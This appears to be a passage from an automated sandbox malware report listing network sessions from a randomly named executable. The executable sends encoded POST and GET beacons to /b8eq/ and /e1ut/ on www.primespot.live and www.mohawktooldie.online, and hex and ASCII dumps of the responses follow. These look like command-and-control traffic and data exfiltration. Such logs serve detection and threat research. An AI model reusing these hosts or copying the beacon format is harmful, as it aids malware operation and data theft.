20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.849732209.74.79.42805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:15.372607946 CET1857OUTPOST /b8eq/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.primespot.live
                                                                                                    Origin: http://www.primespot.live
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.primespot.live/b8eq/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 74 41 6d 59 64 78 47 65 4f 53 54 77 55 6c 45 38 69 2b 35 39 48 56 72 65 51 4e 61 77 74 4f 62 31 38 49 65 65 75 6e 31 70 63 4d 7a 31 39 58 49 32 57 47 55 43 5a 54 30 76 6e 62 71 46 63 78 66 33 69 34 67 6a 77 45 58 2f 39 63 4e 6a 65 4e 78 74 4f 39 32 43 62 42 77 58 63 34 67 54 65 45 57 74 6b 56 37 5a 72 6e 30 72 41 6c 4f 4f 62 4d 35 49 4f 4a 79 51 69 75 68 33 73 43 74 61 45 79 46 4d 64 37 4f 2f 50 64 67 50 52 69 79 32 4d 52 64 77 38 57 41 42 74 73 6a 36 63 6c 4b 71 43 47 48 35 70 6c 45 4b 4e 71 6c 4e 51 48 55 71 61 71 68 35 36 73 76 4c 4e 32 52 47 53 6f 57 6b 56 34 4e 68 55 30 34 74 6e 50 52 35 6a 31 6f 48 78 7a 4f 42 2b 2f 33 53 67 35 4f 2b 32 4c 30 67 74 6e 67 6d 6a 38 2b 30 32 45 50 71 4f 5a 6d 4d 70 79 7a 78 33 35 79 65 58 30 6a 75 2f 70 73 52 38 78 58 76 42 44 66 71 4c 4f 48 69 71 61 35 51 6f 5a 64 42 4a 49 6e 48 38 63 4a 51 62 62 30 46 31 4d 33 38 2b 36 7a 2b 66 79 6a 4e 58 73 6b 6b 33 35 39 47 73 38 52 63 33 51 78 67 51 63 72 49 6c 70 6a 4e 43 75 4a 53 2f 66 4e 4d 64 44 57 [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=tAmYdxGeOSTwUlE8i+59HVreQNawtOb18Ieeun1pcMz19XI2WGUCZT0vnbqFcxf3i4gjwEX/9cNjeNxtO92CbBwXc4gTeEWtkV7Zrn0rAlOObM5IOJyQiuh3sCtaEyFMd7O/PdgPRiy2MRdw8WABtsj6clKqCGH5plEKNqlNQHUqaqh56svLN2RGSoWkV4NhU04tnPR5j1oHxzOB+/3Sg5O+2L0gtngmj8+02EPqOZmMpyzx35yeX0ju/psR8xXvBDfqLOHiqa5QoZdBJInH8cJQbb0F1M38+6z+fyjNXskk359Gs8Rc3QxgQcrIlpjNCuJS/fNMdDWVBhgw7UWrvUOyvUzgar+Mn5D/NX5PMiVzJE6z3Uq416E9qKabprGFX/05Ir8MiZnPfj5RGrNBT5gDPCqu6dxfFRiqVnWukt0ca4idDRfBwt9OSOyr2nwMDez7orZd6ZUPBR8hoztUdmkhhnT2QI3CKWfVJBmryyJVkapbCVmva9XP+q+8Jhio6vhmBRuPiU2aQ9SiX0y96mpKXCkjW/7QTVApQ5wJmhYwMGt+JKtL1CrOfKVsy9Zg358xvYyju5fvxmi3CrV/6jlqyd1NLAPc3GQtu7+EYQIzlJxV4a9wZABLkeqXo7lYzs3Ju1CWj02lv666jmzSFZCrOBi9Zh3bPatC+HZ5z6yrR6EcNZQWZ/ei0+0KLG9Ste6JOBG6N5xpBu778hbZH+jFNqplhuRHTyn7YcnQbzvavO7BzQ2Nu//PlowYXv0u3hSOmP94smEwXbZfIcMCZFCxhCmhr61Zvu044TrrrePgqJ4wI5Qcd6iwRYlDOV7wgcvrWK5cDTj3aCB6Sq9YSnmxzpwPOokK0hWml/tPXQDY4DdWnyl/jLhYkbTa/Og81b/9iIk7lfG5X41APrKWYNC1JTPlhRKgWOht8yQnQHJOd6LJJuPAzTQhe9fnAPZOw2Qd1tln73SMsJ240+FAR2ycmJCWHUHgPVO3kjPx3DCWb [TRUNCATED]
                                                                                                    Dec 3, 2024 14:17:16.649714947 CET533INHTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:16 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.849733209.74.79.42805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:18.174067020 CET563OUTGET /b8eq/?1JgHkl=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxDBcOFJwWRQ35vHrygTRMD3WsSY1KHoe5ieZg+FRRJHZJBA==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.primespot.live
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:19.300564051 CET548INHTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:17:19 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 389
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.849734208.91.197.27805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:25.121068954 CET838OUTPOST /e1ut/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Origin: http://www.mohawktooldie.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.mohawktooldie.online/e1ut/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 53 45 37 74 67 54 32 6e 39 72 54 6e 75 4c 4c 75 31 38 45 79 2b 47 54 66 31 39 77 41 47 33 4a 31 5a 58 39 58 67 61 44 6e 48 2b 69 47 62 39 6b 59 61 66 6e 62 59 48 49 42 79 73 4f 79 53 47 6e 41 46 42 63 65 48 69 72 64 59 49 45 41 38 76 68 5a 70 71 61 30 6c 62 34 4d 4d 57 44 6c 76 61 36 46 59 6a 64 58 4f 38 64 68 6e 76 50 30 37 47 41 4d 35 7a 56 73 6a 47 7a 4e 6b 68 63 6d 68 64 69 70 55 79 36 52 79 37 58 39 44 54 62 65 6c 6a 44 4f 77 4a 71 47 34 64 4d 59 74 77 6c 47 4e 77 54 49 66 50 63 46 47 4d 68 70 32 4f 61 57 64 34 63 6c 6c 30 49 33 68 71 61 63 30 59 62 4d 32 74 63 44 46 35 34 51 4c 74 73 3d
                                                                                                    Data Ascii: 1JgHkl=SE7tgT2n9rTnuLLu18Ey+GTf19wAG3J1ZX9XgaDnH+iGb9kYafnbYHIBysOySGnAFBceHirdYIEA8vhZpqa0lb4MMWDlva6FYjdXO8dhnvP07GAM5zVsjGzNkhcmhdipUy6Ry7X9DTbeljDOwJqG4dMYtwlGNwTIfPcFGMhp2OaWd4cll0I3hqac0YbM2tcDF54QLts=


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.849735208.91.197.27805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:27.787919998 CET858OUTPOST /e1ut/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Origin: http://www.mohawktooldie.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.mohawktooldie.online/e1ut/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 53 45 37 74 67 54 32 6e 39 72 54 6e 75 6f 44 75 79 61 4d 79 70 32 54 59 77 39 77 41 55 33 4a 78 5a 58 68 58 67 62 33 4a 47 49 61 47 62 66 73 59 62 65 6e 62 62 48 49 42 35 4d 4f 33 57 47 6e 4c 46 42 59 73 48 67 76 64 59 49 67 41 38 71 46 5a 6f 64 32 37 6d 72 34 4b 41 32 44 37 68 36 36 46 59 6a 64 58 4f 38 4a 66 6e 76 6e 30 37 32 77 4d 2f 52 39 76 69 47 7a 4d 74 42 63 6d 6c 64 69 74 55 79 36 76 79 36 4b 59 44 56 48 65 6c 69 7a 4f 7a 59 71 42 33 64 4d 65 77 41 6c 55 47 68 71 4d 47 49 4d 4d 62 4c 63 4d 71 38 4f 46 59 4f 74 50 2f 57 41 78 69 71 79 33 30 62 7a 36 7a 61 42 72 66 61 6f 67 56 36 36 54 44 7a 30 32 67 42 7a 39 71 2f 31 30 33 52 36 50 50 75 67 6a
                                                                                                    Data Ascii: 1JgHkl=SE7tgT2n9rTnuoDuyaMyp2TYw9wAU3JxZXhXgb3JGIaGbfsYbenbbHIB5MO3WGnLFBYsHgvdYIgA8qFZod27mr4KA2D7h66FYjdXO8Jfnvn072wM/R9viGzMtBcmlditUy6vy6KYDVHelizOzYqB3dMewAlUGhqMGIMMbLcMq8OFYOtP/WAxiqy30bz6zaBrfaogV66TDz02gBz9q/103R6PPugj


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.849736208.91.197.27805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:30.443095922 CET1875OUTPOST /e1ut/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Origin: http://www.mohawktooldie.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.mohawktooldie.online/e1ut/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 53 45 37 74 67 54 32 6e 39 72 54 6e 75 6f 44 75 79 61 4d 79 70 32 54 59 77 39 77 41 55 33 4a 78 5a 58 68 58 67 62 33 4a 47 49 53 47 62 74 55 59 55 64 50 62 61 48 49 42 30 73 4f 32 57 47 6e 53 46 42 67 53 48 67 6a 72 59 4b 49 41 75 38 5a 5a 39 5a 69 37 78 62 34 4b 49 57 44 36 76 61 36 55 59 6e 78 54 4f 38 5a 66 6e 76 6e 30 37 30 34 4d 38 44 56 76 67 47 7a 4e 6b 68 63 71 68 64 69 4a 55 79 69 67 79 36 50 74 44 44 33 65 6b 43 6a 4f 32 75 57 42 2b 64 4d 63 7a 41 6b 48 47 67 57 44 47 4d 73 58 62 4f 4a 6e 71 2b 75 46 61 50 5a 4d 6a 6b 4d 31 2f 4a 61 46 74 5a 44 73 7a 4b 46 79 42 63 30 6c 64 34 2f 39 49 32 45 64 67 6e 50 49 75 39 59 39 75 47 6d 42 50 75 52 51 41 78 67 6d 70 71 79 54 78 70 6c 61 6c 50 42 71 4b 44 30 4b 70 73 4f 34 43 39 76 4a 63 76 62 48 42 4f 35 41 4e 41 2f 32 61 30 35 77 53 58 77 6b 66 75 32 49 65 6e 6b 56 63 30 6c 46 5a 5a 6b 71 54 6e 52 78 2f 69 37 77 71 43 63 4e 56 32 57 32 58 63 63 47 48 72 38 67 67 68 2b 6f 36 76 36 35 44 34 4e 36 48 52 77 62 69 73 77 71 71 50 36 [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=SE7tgT2n9rTnuoDuyaMyp2TYw9wAU3JxZXhXgb3JGISGbtUYUdPbaHIB0sO2WGnSFBgSHgjrYKIAu8ZZ9Zi7xb4KIWD6va6UYnxTO8Zfnvn0704M8DVvgGzNkhcqhdiJUyigy6PtDD3ekCjO2uWB+dMczAkHGgWDGMsXbOJnq+uFaPZMjkM1/JaFtZDszKFyBc0ld4/9I2EdgnPIu9Y9uGmBPuRQAxgmpqyTxplalPBqKD0KpsO4C9vJcvbHBO5ANA/2a05wSXwkfu2IenkVc0lFZZkqTnRx/i7wqCcNV2W2XccGHr8ggh+o6v65D4N6HRwbiswqqP6bTeFRc5fBgDoLp6RCDEO5Tfyk92iF05b6Dhf26N2KH/N/dj2uBd7za+GLLeCsn4TMbWcUmizcQHmHcXPZrPmxEsWqyPyo2cT8X2oUhxO9/2sYTWHTH2IjYjzpAV/jHxdibMCHzaUbEOVWRGzHbs4u7/8g5Mhb7GZCNaEZFyycgFJdF0+0+Gj6ZSfMyPyI6t0ESf0qZf/X08ioQErDQJd2Qh/W5sB0OMF2Hr7MiU1OiNjavSXAzoPIgClJS5aM921vI3PbYz4qocQo+Q0jcyROYOCKfUPL0akP7MUv2xyrTMt2CqYu7jowCiDHR2qdt9m41MrQifC4hhzp4m5KJ+5N7G+CCgiWkndG+nwHB1SOloZOz4oWecvoQEWpTNDYUyekBn2+IqU5/zwGO0LwmXKRBlAISh2Iv90291NcDt9UG8JdpISrd98HUBy7T0ZwPMVhX1SddtECsvDantwZqvVZMZIbjBbpxqagKn7KDxnIYBG/y2r+jnNgvN2G5gS9LYarvQHOBo6NgXMeviFgLkFOH2imnEuYBNQ9u8gBkThl4W/CzRU7St1B8pvnnvF4kgaTRDB/P/9R2IdREaV3nTmlrrxJsWkUflwXb9AyPdUePSeVMrWsybfjlMX09wPqizHawjcm7f8sEXh0ScmTk4J5d2OwFhuQApzaY [TRUNCATED]


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.849737208.91.197.27805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:17:33.093357086 CET569OUTGET /e1ut/?uZ9=wvL0WTq0tnld4P&1JgHkl=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iq978UInban7m5bgNeGe1Bvvfx4xUX/Ch8llqthzcuqNnDWQ== HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.mohawktooldie.online
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:17:34.812501907 CET1236INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 03 Dec 2024 13:17:34 GMT
                                                                                                    Server: Apache
                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                    Set-Cookie: vsid=906vr48077745424966332; expires=Sun, 02-Dec-2029 13:17:34 GMT; Max-Age=157680000; path=/; domain=www.mohawktooldie.online; HttpOnly
                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_SH/AVE9rAOJDQLdU3HQ1C3tPp+gaMYO14hodDs3qiBwzxkzW2oPM6sNlVvjoGk5BVhxZ+CcOsuyg2QO6s8aVtQ==
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Connection: close
                                                                                                    Data Raw: 62 62 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e
                                                                                                    Data Ascii: bb0a<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.n
                                                                                                    Dec 3, 2024 14:17:34.812530041 CET1236INData Raw: 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64
                                                                                                    Data Ascii: et"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
                                                                                                    Dec 3, 2024 14:17:34.812539101 CET256INData Raw: 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69
                                                                                                    Data Ascii: ction(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="langua
                                                                                                    Dec 3, 2024 14:17:34.812659979 CET1236INData Raw: 61 74 6f 72 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f
                                                                                                    Data Ascii: ator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&w
                                                                                                    Dec 3, 2024 14:17:34.812768936 CET1236INData Raw: 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 64 2e 73 65 61 72 63 68 2e
                                                                                                    Data Ascii: sh.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="h
                                                                                                    Dec 3, 2024 14:17:34.812781096 CET292INData Raw: 7b 75 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 76 28 22 62 6f 64 79 22 29 3b 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68
                                                                                                    Data Ascii: {u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cm
                                                                                                    Dec 3, 2024 14:17:34.857031107 CET1236INData Raw: 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 3a 30 29 3e 30 3f 22 22 3a 22 2e 6d 69 6e 22 3b 76 61 72 20 61 3d 78 28 22 63 6d 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69
                                                                                                    Data Ascii: mpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/
